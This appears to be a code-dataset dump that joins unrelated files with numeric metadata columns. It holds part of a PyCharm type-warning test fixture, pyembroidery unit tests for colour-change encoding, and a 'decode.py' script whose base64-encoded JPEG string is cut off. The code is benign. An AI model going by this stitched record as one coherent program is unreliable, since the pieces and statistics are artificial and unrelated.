f(<warning descr="Expected type 'str', got 'bool' instead">o == o</warning>)
f(<warning descr="Expected type 'str', got 'bool' instead">o >= o</warning>)
f(<warning descr="Expected type 'str', got 'bool' instead">'foo' > 'bar'</warning>)
f(<warning descr="Expected type 'str', got 'bool' instead"><warning descr="Expected type 'int', got 'C' instead">c</warning> < 1</warning>)
f(<warning descr="Expected type 'str', got 'list' instead">c > 1</warning>)
f(<warning descr="Expected type 'str', got 'bool' instead">c == 1</warning>)
f(<warning descr="Expected type 'str', got 'bool' instead">c in [1, 2, 3]</warning>)
| 45.65
| 143
| 0.580504
| 129
| 913
| 4.077519
| 0.224806
| 0.205323
| 0.342205
| 0.410646
| 0.743346
| 0.743346
| 0.743346
| 0.743346
| 0.743346
| 0.589354
| 0
| 0.011268
| 0.222344
| 913
| 19
| 144
| 48.052632
| 0.729577
| 0
| 0
| 0
| 0
| 0
| 0.403649
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.0625
| 0
| null | null | 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
2d66c6761be5cf43ee49fb07d7e5c9209cd76478
| 4,158
|
py
|
Python
|
test/test_encoder.py
|
mrjohnmain/pyembroidery
|
3acaa543e3ffaad67f83092ab3151fce87c76ec4
|
[
"MIT"
] | null | null | null |
test/test_encoder.py
|
mrjohnmain/pyembroidery
|
3acaa543e3ffaad67f83092ab3151fce87c76ec4
|
[
"MIT"
] | null | null | null |
test/test_encoder.py
|
mrjohnmain/pyembroidery
|
3acaa543e3ffaad67f83092ab3151fce87c76ec4
|
[
"MIT"
] | null | null | null |
from __future__ import print_function
import unittest
from pattern_for_tests import *
class TestEmbpattern(unittest.TestCase):
def test_encoder_bookend_color_break(self):
pattern = EmbPattern()
pattern.add_command(COLOR_BREAK)
pattern.add_command(COLOR_BREAK)
pattern.add_command(COLOR_BREAK)
pattern.add_command(COLOR_BREAK)
pattern.stitch_abs(0, 0)
pattern.stitch_abs(0, 100)
pattern.stitch_abs(100, 100)
pattern.stitch_abs(100, 0)
pattern.stitch_abs(0, 0)
pattern.add_thread("red")
pattern.add_command(COLOR_BREAK)
pattern.add_command(COLOR_BREAK)
pattern.add_command(COLOR_BREAK)
pattern.add_command(COLOR_BREAK)
pattern = pattern.get_normalized_pattern()
self.assertEqual(len(pattern.threadlist), 1)
self.assertEqual(pattern.count_stitch_commands(COLOR_CHANGE), 0)
def test_encoder_multiple_internal_breaks(self):
pattern = EmbPattern()
pattern.add_command(COLOR_BREAK)
pattern.stitch_abs(0, 0)
pattern.stitch_abs(0, 100)
pattern.stitch_abs(100, 100)
pattern.stitch_abs(100, 0)
pattern.stitch_abs(0, 0)
pattern.add_thread("red")
pattern.add_command(COLOR_BREAK)
pattern.add_command(COLOR_BREAK)
pattern.add_command(COLOR_BREAK)
pattern.add_command(COLOR_BREAK)
pattern.stitch_abs(0, 0)
pattern.stitch_abs(0, 100)
pattern.stitch_abs(100, 100)
pattern.stitch_abs(100, 0)
pattern.stitch_abs(0, 0)
pattern.add_thread("green")
pattern.add_command(COLOR_BREAK)
pattern = pattern.get_normalized_pattern()
self.assertEqual(pattern.count_stitch_commands(COLOR_CHANGE), 4)
self.assertEqual(len(pattern.threadlist), 5)
def test_encoder_colorchange(self):
pattern = EmbPattern()
pattern.add_command(COLOR_BREAK)
pattern.stitch_abs(0, 0)
pattern.stitch_abs(0, 100)
pattern.stitch_abs(100, 100)
pattern.stitch_abs(100, 0)
pattern.stitch_abs(0, 0)
pattern.add_thread("red")
pattern.add_command(COLOR_BREAK)
pattern.stitch_abs(0, 0)
pattern.stitch_abs(0, 100)
pattern.stitch_abs(100, 100)
pattern.stitch_abs(100, 0)
pattern.stitch_abs(0, 0)
pattern.add_thread("green")
pattern.add_command(COLOR_BREAK)
pattern.stitch_abs(0, 0)
pattern.stitch_abs(0, 100)
pattern.stitch_abs(100, 100)
pattern.stitch_abs(100, 0)
pattern.stitch_abs(0, 0)
pattern.add_thread("blue")
pattern.add_command(COLOR_BREAK)
pattern = pattern.get_normalized_pattern()
self.assertEqual(pattern.count_stitch_commands(COLOR_CHANGE) + 1, len(pattern.threadlist))
def test_encoder_needleset(self):
pattern = EmbPattern()
pattern.add_command(COLOR_BREAK)
pattern.stitch_abs(0, 0)
pattern.stitch_abs(0, 100)
pattern.stitch_abs(100, 100)
pattern.stitch_abs(100, 0)
pattern.stitch_abs(0, 0)
pattern.add_thread("red")
pattern.add_command(COLOR_BREAK)
pattern.stitch_abs(0, 0)
pattern.stitch_abs(0, 100)
pattern.stitch_abs(100, 100)
pattern.stitch_abs(100, 0)
pattern.stitch_abs(0, 0)
pattern.add_thread("green")
pattern.add_command(COLOR_BREAK)
pattern.stitch_abs(0, 0)
pattern.stitch_abs(0, 100)
pattern.stitch_abs(100, 100)
pattern.stitch_abs(100, 0)
pattern.stitch_abs(0, 0)
pattern.add_thread("blue")
pattern.add_command(COLOR_BREAK)
pattern = pattern.get_normalized_pattern({"thread_change_command": NEEDLE_SET})
self.assertEqual(pattern.count_stitch_commands(NEEDLE_SET), len(pattern.threadlist))
def test_transcode_to_self(self):
    """Transcoding a pattern onto itself (source == destination) must not
    destroy its stitches — the encoder has to tolerate in-place operation."""
    pattern = get_shift_pattern()
    from pyembroidery.EmbEncoder import Transcoder
    encoder = Transcoder()
    encoder.transcode(pattern, pattern)
    # assertNotEquals is a deprecated alias (removed in Python 3.12);
    # use the canonical assertNotEqual instead.
    self.assertNotEqual(len(pattern.stitches), 0)
| 36.473684
| 98
| 0.664262
| 524
| 4,158
| 4.994275
| 0.10687
| 0.223538
| 0.275124
| 0.175392
| 0.839129
| 0.797478
| 0.781811
| 0.781811
| 0.761941
| 0.753917
| 0
| 0.052947
| 0.236893
| 4,158
| 113
| 99
| 36.79646
| 0.771825
| 0
| 0
| 0.798077
| 0
| 0
| 0.013468
| 0.005051
| 0
| 0
| 0
| 0
| 0.067308
| 1
| 0.048077
| false
| 0
| 0.038462
| 0
| 0.096154
| 0.009615
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
2dc6bfadc24ecea9f04ddd365686b61005d405ce
| 31,719
|
py
|
Python
|
indriyaan-frontend/decode.py
|
saurav111/indriyaan
|
276f2af95d6a7b67c9c5021a14911127e4f76649
|
[
"MIT"
] | null | null | null |
indriyaan-frontend/decode.py
|
saurav111/indriyaan
|
276f2af95d6a7b67c9c5021a14911127e4f76649
|
[
"MIT"
] | null | null | null |
indriyaan-frontend/decode.py
|
saurav111/indriyaan
|
276f2af95d6a7b67c9c5021a14911127e4f76649
|
[
"MIT"
] | null | null | null |
import base64
string = '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
